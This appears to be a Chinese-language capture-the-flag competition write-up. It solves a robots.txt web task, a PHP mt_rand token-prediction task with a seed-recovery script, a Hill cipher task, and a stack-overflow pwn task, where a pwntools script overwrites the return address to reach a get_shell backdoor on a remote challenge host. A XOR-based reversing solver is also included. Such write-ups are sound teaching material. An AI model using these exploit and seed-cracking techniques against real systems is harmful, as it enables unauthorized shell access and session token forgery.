-

很可惜有一道逆向就差一点解出来

Web

web1

访问robots.txt

image-20240629093445501

然后访问 /robot-nurses 再下拉到最后一行

image-20240629093459287

web4

访问 robots.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
    include 'flag.php';
    session_start();
    $_SESSION['seed']='xxxxxxxxxxxxxxxxx';
    
    function createToken(){
        mt_srand($_SESSION['seed']);
        $dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        $token = '';
        for ( $i = 0; $i <20; $i++ ){
            $token .= substr($dic,mt_rand(0, strlen($dic) - 1), 1);
        }

        $_SESSION['token']=$token;
        $top10=substr($token,0,10);
        echo '<p class="p1">Generate token successfully</p><p class="p2">鎻愮ず锛氭偍鐨勪护鐗屽墠10浣嶄负锛�'.$top10.'</p>';
    }
    createToken();
    if(isset($_POST['token'])){
        if($_POST['token']==$_SESSION['token']){
            echo '<p class="p2">浠ょ墝楠岃瘉鎴愬姛锛岃繖鏄綘鎯宠鐨勶細'.$flag.'</p>';
        }else{
            echo '<p class="p2">浠ょ墝楠岃瘉澶辫触</p>';
        }
    }
     ?>

一眼 GWCTF 2019 WEB-枯燥的抽奖,搜一下题解 [GWCTF 2019 WEB-枯燥的抽奖_gwctf 2019]枯燥的抽奖 1-CSDN博客

先得出随机值

1
2
3
4
5
6
7
8
9
10
str1='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2='R9WLuE5hGV'
length = len(str2)
res=''
for i in range(len(str2)):  
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
            break
print(res)

得到种子

image-20240629110956158

POC:

1
2
3
4
5
6
7
8
9
10
11
<?php

$seed = 2107153532;
mt_srand($seed);
$dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$token = '';
for ( $i = 0; $i <20; $i++ ){
    $token .= substr($dic,mt_rand(0, strlen($dic) - 1), 1);
}
echo $token;
?>

得到 token

image-20240629111103310

填入得到 flag

image-20240629111122945

Crypto

crypto1

png 提示为 hill 加密,010 打开 png 得到密文 CLYCOEXMAYHD。然后 hill 解密

image-20240629123326172

Pwn

pwn1

在 vul 函数处发现栈溢出点

image-20240629100617628

存在后门函数 get_shell

image-20240629100635962

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
from LibcSearcher import *

def s(a):
    io.send(a)
def sa(a, b):
    io.sendafter(a, b)
def sl(a):
    io.sendline(a)
def sla(a, b):
    io.sendlineafter(a, b)
def r():
    return io.recv()
def pr():
    print(io.recv())
def rl(a):
    return io.recvuntil(a)
def inter():
    io.interactive()
def debug():
    gdb.attach(io)
    pause()
def get_64addr():
    return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_32addr():
    return u32(io.recvuntil(b'\xf7')[-4:])
def get_64sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def get_32sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def get_64sb_libcsearch():
    return libc_base + libc.dump('system'), libc_base + libc.dump('str_bin_sh')
def get_32sb_libcsearch():
    return libc_base + libc.dump('system'), libc_base + libc.dump('str_bin_sh')

# context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
# io = process('./pwn')
elf = ELF('./pwn')
io = remote("111.74.9.131",10309)

padding = 0x30 + 8
sh = 0x4008D0

payload = flat([padding*b'a'],sh)
sl(payload)

inter()

image-20240629100742645

Re

Re2

查看主函数,发现有两个逻辑处理

1.

image-20240629135505660

输入的 flag 和 0x7FF7B9AE3020 地址处的进行异或

2.

image-20240629135626336

v31 处以 0x7FF7B9AE30A0 出的值作为下标,并把 flag 的值赋予给它

然后要求所得值为 “23gJba3au9mnk3c10:0zp8qJr41H39jp”,编写 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
en = [0x00000053, 0x00000045, 0x0000005C, 0x0000001E, 0x00000050, 0x00000013,0x0000002F, 0x00000078, 0x00000004, 0x00000053, 0x00000058,0x0000004A, 0x00000043, 0x00000001, 0x00000041, 0x0000002A,0x00000008,
      0x00000040, 0x00000067, 0x0000002F, 0x0000000C, 0x0000004A, 0x00000012, 0x0000002E,0x00000041, 0x0000006C, 0x00000005, 0x00000054, 0x00000040, 0x00000012, 0x0000005B, 0x0000004F]

print(len(en))

v = [0x00000004, 0x0000000F, 0x0000000B, 0x0000001E, 0x0000000E, 0x00000014, 0x0000001F, 0x00000009, 0x00000017, 0x00000002, 0x00000019, 0x0000001C, 0x00000012, 0x00000010, 0x00000000, 0x00000008, 0x00000011, 0x00000001, 0x00000015, 0x00000003, 0x0000000A, 0x0000001D, 0x0000000C, 0x00000016, 0x00000018, 0x0000000D, 0x0000001B, 0x00000005, 0x00000007, 0x00000006, 0x00000013, 0x0000001A]
print(len(v))

strs = "23gJba3au9mnk3c10:0zp8qJr41H39jp"
strs = [ord(i) for i in strs]

flag = []
for i in v:
    flag.append(strs[i])

for i in range(len(flag)):
    print(chr(flag[i]^en[i]),end="")

得到 flag

image-20240629135837993

许可协议

本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章